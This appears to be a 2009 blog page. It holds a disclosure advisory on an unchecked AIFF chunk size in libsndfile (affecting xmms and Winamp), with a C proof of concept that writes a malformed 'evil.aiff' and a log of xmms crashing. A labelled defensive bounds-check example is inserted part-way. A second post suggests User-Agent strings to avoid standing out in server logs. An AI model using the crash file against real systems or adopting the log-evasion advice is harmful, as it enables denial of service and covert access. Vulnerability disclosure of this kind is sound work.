Saturday, February 14, 2009

libsndfile AIFF buffer unverified


A security issue affects the following library/software releases:

libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <= 5.541

and possibly others.

-BACKGROUND

Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.

-DESCRIPTION

While testing and debugging Winamp, I verified that the bug is specific to
the libsndfile library. I saw that some of the functions that read AIFF file
headers do not check the limits of (CommonChunk.ckSize). There may be other
functions with the same problem. One of the errors occurs when memset is
called with an unverified size that exceeds the limit of the memory.

Quoted code segment at src/aiff.c:847
============================================================
else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
{
    // Some lines omitted

    memset (psf->u.scbuf, 0, comm_fmt->size);
============================================================
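The bound the advisory describes as missing, shown as an added example that is not from the advisory and not libsndfile's code: a minimal C reader for the FORM header and COMM chunk that checks CommonChunk.ckSize against both the remaining file length and the fixed scratch buffer before any memset/memcpy touches it. SCBUF_SIZE, the function names and the return codes are assumptions; the two headers are constructed, the second mirroring the PoC's "AAAA" ckSize field.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SCBUF_SIZE 64           /* stands in for psf->u.scbuf; the size is an assumption */
#define SIZEOF_AIFF_COMM 18     /* numChannels(2) numSampleFrames(4) sampleSize(2) sampleRate(10) */

enum { COMM_OK = 0, COMM_BAD_MAGIC = -1, COMM_TOO_SHORT = -2,
       COMM_SIZE_EXCEEDS_FILE = -3, COMM_SIZE_EXCEEDS_BUFFER = -4 };

static uint32_t be32(const unsigned char *p)    /* AIFF integers are big-endian */
{   return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }

/* Read the FORM header and the first COMM chunk into scbuf. Every length taken from the
 * file is checked against what is really available before memset/memcpy touch the buffer. */
int read_comm_chunk(const unsigned char *file, size_t len, unsigned char scbuf[SCBUF_SIZE])
{
    if (len < 20)                                   /* FORM(8) + "AIFF"(4) + chunk header(8) */
        return COMM_TOO_SHORT;
    if (memcmp(file, "FORM", 4) != 0 || memcmp(file + 12, "COMM", 4) != 0 ||
        (memcmp(file + 8, "AIFF", 4) != 0 && memcmp(file + 8, "AIFC", 4) != 0))
        return COMM_BAD_MAGIC;
    uint32_t ck_size = be32(file + 16);             /* CommonChunk.ckSize: attacker controlled */
    if (ck_size < SIZEOF_AIFF_COMM)
        return COMM_TOO_SHORT;
    if (ck_size > len - 20)                         /* claims more bytes than the file holds */
        return COMM_SIZE_EXCEEDS_FILE;
    if (ck_size > SCBUF_SIZE)                       /* the bound missing before the memset */
        return COMM_SIZE_EXCEEDS_BUFFER;
    memset(scbuf, 0, SCBUF_SIZE);
    memcpy(scbuf, file + 20, ck_size);
    return COMM_OK;
}

/* Constructed inputs: a well-formed mono, 16-bit, 44100 Hz header, and one mirroring the
 * advisory's PoC, whose ckSize field is "AAAA" (0x41414141). sizeof-1 drops the literal's NUL. */
static const unsigned char good_aiff[] =
    "FORM\x00\x00\x00\x1e" "AIFF" "COMM\x00\x00\x00\x12"
    "\x00\x01" "\x00\x00\x00\x00" "\x00\x10" "\x40\x0e\xac\x44\x00\x00\x00\x00\x00\x00";
static const unsigned char evil_aiff[] =
    "FORM\x00\x04\xcd\xec" "AIFF" "COMM" "AAAA" "AAAAAAAAAAAAAAAA";

int parse_status(const unsigned char *f, size_t n)  /* return code for any header */
{   unsigned char scbuf[SCBUF_SIZE]; return read_comm_chunk(f, n, scbuf); }

int good_channels(void)                             /* numChannels parsed from good_aiff */
{   unsigned char scbuf[SCBUF_SIZE];
    if (read_comm_chunk(good_aiff, sizeof good_aiff - 1, scbuf) != COMM_OK) return -1;
    return (scbuf[0] << 8) | scbuf[1]; }
```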

-CODE

============================================================
#include <stdio.h>
#include <stdlib.h>

/* 81 bytes: "FORM" + size, "AIFF", then a "COMM" chunk whose ckSize field
 * is "AAAA" (0x41414141), filler bytes and a short trailing sequence. */
#define AIFFSIZE 81
const char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void) {
    /* "wb": binary mode, so no byte is altered by text-mode translation */
    FILE *aiff = fopen("evil.aiff", "wb");
    if (aiff == NULL) {
        perror("fopen");
        return EXIT_FAILURE;
    }
    if (fwrite(aiffbuff, AIFFSIZE, 1, aiff) != 1) {
        perror("fwrite");
        fclose(aiff);
        return EXIT_FAILURE;
    }
    fclose(aiff);
    return EXIT_SUCCESS;
}
============================================================

When these applications process the file with the invalid headers, they
stop with an unexpected error; tcsh sample:

============================================================

Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff

Segmentation fault

You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.

============================================================

-IMPACT

Just for fun, but still a denial of service against any program that
uses the library.

Regards,

Anon[at]elhacker.net



Another User Agent to use.

As you may recall from a previous post: Which User-Agent to use? So as not to stand out in the logs

There we saw that one of the most common user agents is IE 6 under Windows 5.1 (generally Windows XP).

with the following User-Agent: Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)

Possibly because many people use pirated copies of Windows and cannot update to IE 7, but that was another topic.

With Firefox the most common is: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

However, this will change quickly with Firefox's automatic updates; it will change to 3.0.6 and perhaps the Gecko version as well.

Regards.
